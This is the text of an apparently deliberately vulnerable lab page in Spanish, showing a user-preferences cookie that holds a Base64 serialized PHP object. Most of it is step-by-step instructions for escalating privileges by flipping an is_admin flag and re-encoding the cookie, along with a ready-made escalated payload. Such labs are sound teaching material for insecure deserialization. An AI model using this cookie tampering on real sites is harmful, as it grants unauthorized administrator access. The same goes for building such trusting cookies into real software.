🧑💼 Preferencias de Cuenta
Usuario: guest
Tus preferencias
🔴 Cookie NEXO_PREFS (vulnerable)
Base64:
Decodificado (objeto serializado):
is_admin actual:
false (b:0)
🔓 Cómo escalar privilegios
- Copiá el valor de la cookie (Base64)
- Decodificá:
echo "..." | base64 -d - Buscá
is_admin";b:0 - Cambialo a
is_admin";b:1 - Re-encodá:
echo "..." | base64 - Reemplazá la cookie en DevTools
- Recargá la página
Ejemplo de payload escalado:
Tzo5OiJVc2VyUHJlZnMiOjU6e3M6ODoidXNlcm5hbWUiO3M6NToiZ3Vlc3QiO3M6ODoiaXNfYWRtaW4iO2I6MTtzOjU6InRoZW1lIjtzOjU6ImxpZ2h0IjtzOjg6Imxhbmd1YWdlIjtzOjI6ImVzIjtzOjEzOiJub3RpZmljYXRpb25zIjtiOjE7fQ==